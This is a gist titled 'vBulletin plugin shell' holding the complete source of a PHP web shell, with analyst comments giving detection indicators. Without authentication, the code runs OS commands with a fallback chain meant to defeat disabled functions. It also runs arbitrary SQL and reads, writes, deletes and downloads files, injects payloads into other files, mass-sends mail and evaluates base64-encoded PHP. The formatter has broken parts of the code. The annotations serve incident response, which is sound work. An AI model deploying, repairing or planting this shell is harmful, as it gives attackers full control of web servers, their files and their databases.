@kosborn
Created February 13, 2013 02:00
vBulletin plugin shell
<?php
/*
 * Analyst annotation (review): this listing is a multi-function PHP web shell;
 * its own "ws_ver" response names it "WebShell PHP Server v3.2". It is kept as
 * a sample for detection and incident-response work, not as code to deploy or
 * repair. As shown, the text has been run through a formatter and is not valid
 * PHP; do not attempt to execute it.
 *
 * Control flow: every action is selected by the request parameter "mode"; the
 * only gate is membership in $modearr - there is no authentication of any kind.
 * Triage indicators, all taken from the strings below:
 *   - request parameter "mode" carrying one of the $modearr values;
 *   - response strings "WebShell PHP Server v3.2", "Mail Bomb Complete",
 *     " Infected", "WebShell removed from ", "Didnt Find Shell";
 *   - get_magic_quotes_gpc() and the mysql_* extension, which place the
 *     intended runtime on PHP 5.x (both were removed in PHP 7).
 * Impact if found on a host: treat as full compromise of the web-server
 * account - command execution, arbitrary file read/write/delete, database
 * access and outbound mail are all exposed without credentials.
 */
// Disables the execution time limit; '@' hides the warning when it is not permitted.
@set_time_limit(0);
// Every supported action. A request whose "mode" is outside this list does nothing.
$modearr = array("cmd", "sql", "infect", "upload", "ws_ver", "ws_remove", "ws_read", "ws_save", "ws_mail", "ws_eval", "ws_list", "ws_homedir", "ws_delete", "ws_makedir", "ws_rmdir", "ws_down");
// $_REQUEST: the mode (and every other parameter below) may arrive via GET, POST or cookie.
$mode = $_REQUEST['mode'];
// Note: non-strict in_array; in PHP 5 a value that loosely equals a list entry also passes.
if (in_array($mode, $modearr)) {
// Declared conditionally, so it exists only after the mode check passed.
// Undoes magic_quotes escaping of request data when that PHP 5 setting is on.
function ws_stripslashes($string) {
if (get_magic_quotes_gpc()) {
return StripSlashes($string);
} else {
return $string;
}
}
// Mode "cmd": runs the request-supplied "cmd" with the first execution
// primitive that is not disabled. Hardening note: disable_functions on all
// four names is what this fallback chain is written to defeat.
if ($mode == "cmd") {
$cmd = $_REQUEST['cmd'];
if (function_exists('system')) {
system($cmd);
}
elseif(function_exists('exec')) {
exec($cmd, $output);
foreach($output as $line) {
echo$line.
"\n";
}
}
elseif(function_exists('shell_exec')) {
$output = shell_exec($cmd);
echo$output;
}
elseif(function_exists('popen')) {
$handle = popen($cmd, "r");
// Only the first 2096 bytes of output are returned in this branch.
$read = fread($handle, 2096);
echo$read;
pclose($handle);
}
}
// Mode "sql": connects to a MySQL server with request-supplied credentials and
// lists databases, lists tables, or runs an arbitrary query. Uses the legacy
// mysql_* extension (removed in PHP 7).
if ($mode == "sql") {
$host = $_REQUEST['host'];
$port = $_REQUEST['port'];
$username = $_REQUEST['username'];
$password = $_REQUEST['password'];
$dbname = $_REQUEST['dbname'];
$query = $_REQUEST['query'];
$link = mysql_connect($host.
":".$port, $username, $password) or die('Could not connect: '.mysql_error());
if ($_REQUEST['sqlCmd'] == "getDbs") {
$db_list = mysql_list_dbs($link);
while ($row = mysql_fetch_object($db_list)) {
echo "Database: ".$row - > Database.
"\n";
}
mysql_free_result($db_list);
}
if ($_REQUEST['sqlCmd'] == "getTables") {
$result = mysql_list_tables($dbname);
$num_rows = mysql_num_rows($result);
for ($i = 0; $i < $num_rows; $i++) {
echo "Table: ".mysql_tablename($result, $i).
"\n";
}
mysql_free_result($result);
}
// Raw query execution; rows are printed as "name=value" lines.
if (isset($query)) {
mysql_select_db($dbname, $link) or die('Could not select database');
$result = mysql_query(ws_stripslashes($query)) or die("nInvalid query: ".mysql_error());
while ($row = mysql_fetch_assoc($result)) {
echo "Row {\n";
foreach($row as $variable = > $value) {
echo$variable.
"=".$value.
"\n";
}
echo "\n}\n";
}
}
mysql_close($link);
}
// Mode "infect": reads "sourceFile", then rewrites "infectFile" as
// <sourceFile contents> + "\n" + <original infectFile contents>, i.e. the
// source is prepended to the target. Forensic note: a compromised PHP file
// will therefore carry the injected payload at the top, followed by the
// original content.
if ($mode == "infect") {
$handle = fopen($_REQUEST["sourceFile"], "r+") or die("Error reading source file");
$contents = "";
while (!feof($handle)) {
$contents. = fread($handle, 8192);
}
fclose($handle);
$handle = fopen($_REQUEST['infectFile'], "r") or die("Error reading infect file");
$contents2 = $contents.
"\n";
while (!feof($handle)) {
$contents2. = fread($handle, 8192);
}
fclose($handle);
$fp = fopen($_REQUEST['infectFile'], 'w') or die("Error writing infect file");
$write = fwrite($fp, $contents2);
fclose($fp);
if ($write) {
echo$_REQUEST['infectFile'].
" Infected";
}
}
// Mode "upload": stores an uploaded file under a request-chosen directory
// (the "dir" value is used verbatim, so it must already end with a separator).
if ($mode == "upload") {
if ($_FILES) {
if (is_uploaded_file($_FILES['file']['tmp_name'])) {
$uploadfile = basename($_FILES['file']['name']);
if (move_uploaded_file($_FILES['file']['tmp_name'], $_REQUEST['dir'].$uploadfile)) {
echo $uploadfile.
" has been uploaded!.";
} else {
echo "Upload Failed!!!";
}
}
}
}
// Mode "ws_ver": version banner. The literal below is a reliable response-body
// signature for this family.
if ($mode == "ws_ver") {
echo "WebShell PHP Server v3.2";
}
// Mode "ws_remove": clean-up. Strips everything from an "eval" up to the next
// "?>" out of the named file. Detection note: the regex implies the on-disk
// form of this shell is an "<?php eval(...) ?>" stub inside an otherwise
// legitimate file - search for that pattern when hunting for it.
if ($mode == "ws_remove") {
$handle = fopen($_REQUEST["file"], "r+") or die("Error reading file");
$contents = "";
while (!feof($handle)) {
$contents. = fread($handle, 8192);
}
fclose($handle);
$contents2 = preg_replace('/[<?\s]*eval.*\?>/si', '', $contents);
if ($contents2) {
$fp = fopen($_REQUEST['file'], 'w') or die("Error writing file");
$write = fwrite($fp, $contents2);
fclose($fp);
if ($write) {
echo "WebShell removed from ".$_REQUEST['file'];
}
} else {
echo "Didnt Find Shell";
}
}
// Mode "ws_read": returns the contents of any file the web-server user can read.
if ($mode == "ws_read") {
$handle = fopen($_REQUEST['file'], "r") or die("Error with reading file");
$contents = "";
while (!feof($handle)) {
$contents. = fread($handle, 8192);
}
fclose($handle);
echo$contents;
}
// Mode "ws_save": overwrites any writable file with request-supplied contents.
if ($mode == "ws_save") {
$contents = ws_stripslashes($_REQUEST["contents"]);
$fp = fopen($_REQUEST['file'], 'w') or die("Error writing ".$_REQUEST['file'].
" file");
$write = fwrite($fp, $contents);
fclose($fp);
if ($write) {
echo$_REQUEST['file'].
" saved";
}
}
// Mode "ws_mail": sends the same message "times" times through the local
// mail() transport - an outbound spam relay. Mail-server logs showing bursts
// of identical messages from the web-server account are the typical trace.
if ($mode == "ws_mail") {
$mailtimes = "1";
$headers = 'From: '.ws_stripslashes($_REQUEST['from']).
'';
while ($mailtimes <= $_REQUEST['times']) {
mail(ws_stripslashes($_REQUEST['to']), ws_stripslashes($_REQUEST['subject']), ws_stripslashes($_REQUEST['msg']), $headers);
$mailtimes++;
}
echo "Mail Bomb Complete";
}
// Mode "ws_eval": evaluates base64-decoded PHP from the request. Because the
// payload is encoded in transit, plain-text signatures on the request body
// will not match it; log and inspect the "php" parameter as a whole.
if ($mode == "ws_eval") {
$php = $_REQUEST['php'];
eval(base64_decode(ws_stripslashes($php)));
}
// Mode "ws_list": directory listing. "dir" is concatenated with each entry
// verbatim, so is_dir() is only meaningful when "dir" ends with a separator.
if ($mode == "ws_list") {
$dir = $_REQUEST['dir'];
$hook = opendir($dir) or die('cant open dir');
while (false !== ($file = readdir($hook))) {
$fpath = $dir.$file;
if (is_dir($fpath)) {
if ($file != '.' && $file != '..') {
echo "Directory: ".$file.
"\n";
}
}
if ($file != '.' && $file != '..' && !is_dir($fpath)) {
echo "File: ".$file.
"\n";
}
}
}
// Mode "ws_homedir": discloses the document root.
if ($mode == "ws_homedir") {
echo$_SERVER["DOCUMENT_ROOT"];
}
// Mode "ws_delete": deletes any file the web-server user may unlink.
if ($mode == "ws_delete") {
unlink($_REQUEST['file']) or die('Cant delete file');
echo "File Deleted";
}
// Mode "ws_makedir": creates a directory with a request-supplied permission mode.
if ($mode == "ws_makedir") {
mkdir($_REQUEST['dir'], $_REQUEST['chmod']) or die('Cant create dir');
echo "Directory Created";
}
// Mode "ws_rmdir": removes an (empty) directory.
if ($mode == "ws_rmdir") {
rmdir($_REQUEST['dir']) or die('Cant remove dir');
echo "Directory Removed";
}
// Mode "ws_down": streams any readable file as an attachment. The unvalidated
// "file" value also lands in a response header here.
if ($mode == "ws_down") {
header('Content-type: application/octet-stream');
header('Content-Disposition: attachment; filename='.$_REQUEST['file'].
'');
readfile($_REQUEST['file']);
}
// Terminates so that no host application code runs after the shell handles a request.
die();
}